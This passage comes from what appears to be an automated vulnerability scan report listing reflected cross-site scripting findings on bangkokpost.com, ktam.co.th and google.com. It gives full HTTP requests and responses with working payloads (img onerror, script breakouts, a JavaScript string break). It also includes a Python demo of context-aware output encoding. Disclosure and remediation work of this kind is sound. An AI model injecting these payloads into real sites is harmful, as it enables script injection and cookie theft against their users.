5.69. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 2 (the second path segment) is copied into the HTML document as plain text between tags. The payload d8746<img%20src%3da%20onerror%3dalert(1)>8a060fad1aa was submitted in the REST URL parameter 2. This input was echoed as d8746<img src=a onerror=alert(1)>8a060fad1aa in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response via an img onerror handler in the <h1 class="mainTitle"> breadcrumb. Note that the unmodified segments are rendered with their display names ("Business") while the tampered segment is echoed verbatim, so the lookup that maps a known segment to a title falls through to the raw input for anything unknown.

Request

GET /business/company-in-thailandd8746<img%20src%3da%20onerror%3dalert(1)>8a060fad1aa/financial/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:40:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGdzaGtxMXFqbmFramI0YWFsNW1kOGI4YzUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=1lurb7kr48bkf8m8e3np2epar0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | company-in-thailandd8746<img src=a onerror=alert(1)>8a060fad1aa | financial | search | x26amp</h1>
...[SNIP]...

5.70. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 3 (the third path segment) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b36d"><script>alert(1)</script>ea1d9283a7c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The sink is the travelSearch form's action attribute (see 5.62), reached here under the /business/company-in-thailand/financial/search/ path rather than the /banking/ one, which confirms that the breakout is in shared template code, not a single page.

Request

GET /business/company-in-thailand/financial3b36d"><script>alert(1)</script>ea1d9283a7c/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoidW9wZzVmb29xOHNiMjlhZnN0OGhjYTEzcjAiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=7v0d3t5emql826ovbst4chfe47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<form method="post" action="/business/company-in-thailand/financial3b36d"><script>alert(1)</script>ea1d9283a7c/search/" id="travelSearch" onsubmit="return chkQuery('key','travelSearch','/business/company-in-thailand/financial3b36d">
...[SNIP]...

5.71. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 3 (the third path segment) is copied into the HTML document as plain text between tags. The payload c27b5<img%20src%3da%20onerror%3dalert(1)>76b6c36c1a6 was submitted in the REST URL parameter 3. This input was echoed as c27b5<img src=a onerror=alert(1)>76b6c36c1a6 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the PoC uses an img onerror event handler, and the sink is the <h1 class="mainTitle"> breadcrumb shown below.

Request

GET /business/company-in-thailand/financialc27b5<img%20src%3da%20onerror%3dalert(1)>76b6c36c1a6/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiazlmbnBwdTZpc2YycXZqcDZxcXExMHNpNDUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=bp6voil836ht1ga0i90f4hfhp7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | financialc27b5<img src=a onerror=alert(1)>76b6c36c1a6 | search | x26amp</h1>
...[SNIP]...

5.72. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 4 (the fourth path segment) is copied into the HTML document as plain text between tags. The payload 45064<img%20src%3da%20onerror%3dalert(1)>a1601881358 was submitted in the REST URL parameter 4. This input was echoed as 45064<img src=a onerror=alert(1)>a1601881358 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response through an img onerror handler in the <h1 class="mainTitle"> breadcrumb. As in 5.65, the response is a different, larger template (Content-Length 30406) but the breadcrumb sink is unchanged.

Request

GET /business/company-in-thailand/financial/search45064<img%20src%3da%20onerror%3dalert(1)>a1601881358/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZXNnbmw4cXFoYmo4MDFxaGE4YmpuZzJjdDIiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=7r5lvnugai01bmo8pai02ts4a1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | Financial | search45064<img src=a onerror=alert(1)>a1601881358 | x26amp</h1>
...[SNIP]...

5.73. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 5 (the last path segment) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8080"><img%20src%3da%20onerror%3dalert(1)>dfcd012bd40 was submitted in the REST URL parameter 5. This input was echoed as e8080"><img src=a onerror=alert(1)>dfcd012bd40 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The sink is the content attribute of the <meta name="keywords"> tag in the document head, as in 5.66: the "> ends the attribute and the tag, and the injected img element's onerror handler runs.

Request

GET /business/company-in-thailand/financial/search/x26ampe8080"><img%20src%3da%20onerror%3dalert(1)>dfcd012bd40 HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoicmYwcDhrZjM0Z3U5N3YyOGZicThvZGpjaDEiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=dg5giegaddphgg22s61bknqrf3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<meta name="keywords" content="news,breaking news,latest news, Business, Company in Thailand, Financial : x26ampe8080"><img src=a onerror=alert(1)>dfcd012bd40, current news,world news,national news,business news,Thai news" />
...[SNIP]...

5.74. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The value of REST URL parameter 5 (the last path segment) is copied into the HTML document as plain text between tags. The payload 8aa66<img%20src%3da%20onerror%3dalert(1)>fbd3afe0a9f was submitted in the REST URL parameter 5. This input was echoed as 8aa66<img src=a onerror=alert(1)>fbd3afe0a9f in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the PoC uses an img onerror event handler and the sink is the <h1 class="mainTitle"> breadcrumb shown below, the same value 5.73 shows reaching the keywords meta attribute.

Request

GET /business/company-in-thailand/financial/search/x26amp8aa66<img%20src%3da%20onerror%3dalert(1)>fbd3afe0a9f HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoicjNpdnAxNXF0ajhjOGNxc2FvYzlkZjg4OTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=77fmi84hpv3d5ps1kcmc9rp507; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<h1 class="mainTitle">Bangkok Post : Bangkokpost : Business | Company in Thailand | Financial | search | x26amp8aa66<img src=a onerror=alert(1)>fbd3afe0a9f</h1>
...[SNIP]...

5.75. http://www.bangkokpost.com/forum/viewtopic.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/viewtopic.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 399d4"-alert(1)-"f661d84ae88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

In this case the scanner's "arbitrarily supplied parameter" is extra path information appended after /forum/viewtopic.php, as the request below shows; it is not a query-string parameter. The sink is the inline assignment __th_page="forum-..." inside a <script> block: the payload's first " closes the string literal, -alert(1)- is then evaluated as an arithmetic expression, and the second " reopens a string so the statement stays syntactically valid. No HTML metacharacters are needed, so filters that only strip < and > do not help here.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, every character outside [A-Za-z0-9] should be emitted as a \xHH or \uHHHH escape inside the string literal, which neutralises the quote, the backslash and the </script> sequence alike.

Request

GET /forum/viewtopic.php/399d4"-alert(1)-"f661d84ae88 HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_forum_u=1; expires=Wed, 02-May-2012 13:38:44 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_k=; expires=Wed, 02-May-2012 13:38:44 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_sid=d0d8484c44c6090be03d1eb113d9c39b; expires=Wed, 02-May-2012 13:38:44 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiNjlxNjkxajczdDN1ZTVpcXMxdjFmY2VjNDIiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
<SCRIPT LANGUAGE="javascript1.1"> __th_page="forum-399d4"-alert(1)-"f661d84ae88";</SCRIPT>
...[SNIP]...
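
The three payload shapes used in 5.62 through 5.75 each match one sink context: a text node (the <h1 class="mainTitle"> breadcrumb), a double-quoted HTML attribute (the travelSearch form's action, the keywords meta content) and a double-quoted JavaScript string (__th_page). The following example was added for this annotated copy and is not code from XSS.CX, Hoyt LLC or bangkokpost.com. It reproduces each raw echo against a simplified stand-in template (the templates are assumptions, not the site's real PHP), applies the encoder that fits each context, and checks with an HTML tokenizer and a regular expression whether the input still breaks out. The payloads are the ones shown in the report.

```python
"""
Context-aware output encoding for the three reflection sinks documented in
the bangkokpost.com findings: a text node, a double-quoted attribute and a
double-quoted JavaScript string. The payloads are the scanner's; the page
templates are simplified stand-ins for the site's pages, not its real code.
"""
import html
import re
from html.parser import HTMLParser

# Payloads as they appear decoded in the report's responses (5.64, 5.62, 5.75).
PAYLOAD_TEXT = '83b36<img src=a onerror=alert(1)>e346f5ddf0f'
PAYLOAD_ATTR = '27762"><script>alert(1)</script>e1fd3f25b24'
PAYLOAD_JS = '399d4"-alert(1)-"f661d84ae88'


def js_string_encode(s: str) -> str:
    """Encode a value for a JS string literal inside <script>: every
    non-alphanumeric character becomes \\xHH or \\uHHHH, so neither a quote,
    a backslash nor a </script> sequence can survive into the page."""
    out = []
    for ch in s:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append(f"\\x{cp:02x}")
        elif cp <= 0xFFFF:
            out.append(f"\\u{cp:04x}")
        else:  # astral plane: emit a UTF-16 surrogate pair
            cp -= 0x10000
            out.append(f"\\u{0xD800 + (cp >> 10):04x}\\u{0xDC00 + (cp & 0x3FF):04x}")
    return "".join(out)


def render(segment: str, safe: bool) -> dict:
    """Build the three fragments from one URL path segment. safe=False
    reproduces the raw echo the report documents; safe=True applies the
    encoder that matches each sink (assumed templates, see lead-in)."""
    text = html.escape(segment, quote=False) if safe else segment
    attr = html.escape(segment, quote=True) if safe else segment
    js = js_string_encode(segment) if safe else segment
    return {
        "text": f'<h1 class="mainTitle">Business | {text}</h1>',
        "attr": f'<form method="post" action="/business/{attr}/search/" id="travelSearch">',
        "js": f'__th_page="forum-{js}";',
    }


class _TagCollector(HTMLParser):
    """Records the start tags the tokenizer produces from a fragment."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(fragment: str) -> list:
    """Element names created from the fragment; anything beyond the template's
    own element means the input broke out of its intended context."""
    p = _TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags


def js_literal_intact(fragment: str) -> bool:
    """True if __th_page is assigned exactly one well-formed string literal
    and nothing else, i.e. the input did not terminate the quote early."""
    return re.fullmatch(r'__th_page="(?:[^"\\]|\\.)*";', fragment) is not None


if __name__ == "__main__":
    for name, payload, check in (
        ("text", PAYLOAD_TEXT, start_tags),
        ("attr", PAYLOAD_ATTR, start_tags),
        ("js", PAYLOAD_JS, js_literal_intact),
    ):
        for safe in (False, True):
            frag = render(payload, safe)[name]
            print(f"{name:4} safe={safe!s:5} -> {check(frag)}  {frag}")
```

Run stand-alone it prints, for each sink, the raw and encoded fragment and what the check sees: the raw text and attribute fragments yield an extra img or script element, the raw JS fragment fails the single-literal check, and the encoded versions pass. The point of the three separate encoders is that html.escape() alone would not have saved the __th_page sink (it leaves the quote as &quot; only in HTML, and a JS string inside <script> is not HTML-decoded), while JS escaping alone would not have saved the breadcrumb.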

5.76. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript context. The payload 575eb(a)82b386816b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

The scanner reports the echo as a JavaScript expression not encapsulated in any quotation marks, but the response below shows it inside a single-quoted string literal passed to google.History.initialize('/advanced_search?575eb(a)82b386816b5\x3d1'). The payload itself contains only letters, digits and parentheses, none of which can leave a string literal, and the = that followed it has already been rewritten to \x3d, which indicates the value is JavaScript-escaped before it is written into the script. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. Treat this entry as unconfirmed unless a manual test shows a ' or \ in the parameter name surviving that encoding; note also that the response carries X-XSS-Protection: 1; mode=block, which would stop a reflected payload in browsers that honour it.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?575eb(a)82b386816b5=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=acSPd8Kefo7UVfp2rrsX7MvMbbFbC_p0DFBwNMSS9hIpvqoBS7sbRUdsd-3AK6Z1qzfNC-3jjdoFTI8QMr8hgigvHeieDToRNhf6IyV8kWDDFmb39r-VWGRaILAhefvc; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:29:41 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?575eb(a)82b386816b5\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

5.77. http://www.ktam.co.th/en/alliance.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/alliance.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72069"><img%20src%3da%20onerror%3dalert(1)>67ca8253b6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72069\"><img src=a onerror=alert(1)>67ca8253b6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/alliance.php/72069"><img%20src%3da%20onerror%3dalert(1)>67ca8253b6d HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:44 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 24919


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>Krung Thai Asset Management Public Company Limited. :- Happy Life Happy Investment</title>
<link href="style
...[SNIP]...
<a href="../th/72069\"><img src=a onerror=alert(1)>67ca8253b6d" title="THAI">
...[SNIP]...

5.78. http://www.ktam.co.th/en/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba2b9"><img%20src%3da%20onerror%3dalert(1)>af4f8f44d0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba2b9\"><img src=a onerror=alert(1)>af4f8f44d0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ba2b9"><img%20src%3da%20onerror%3dalert(1)>af4f8f44d0f HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Set-Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0; path=/
Connection: close
Content-Type: text/html
Content-Length: 29513

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/ba2b9\"><img src=a onerror=alert(1)>af4f8f44d0f" title="THAI">
...[SNIP]...

5.79. http://www.ktam.co.th/en/index.php/a [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/a

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff890"><img%20src%3da%20onerror%3dalert(1)>6438a4cf726 was submitted in the REST URL parameter 3. This input was echoed as ff890\"><img src=a onerror=alert(1)>6438a4cf726 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/aff890"><img%20src%3da%20onerror%3dalert(1)>6438a4cf726 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

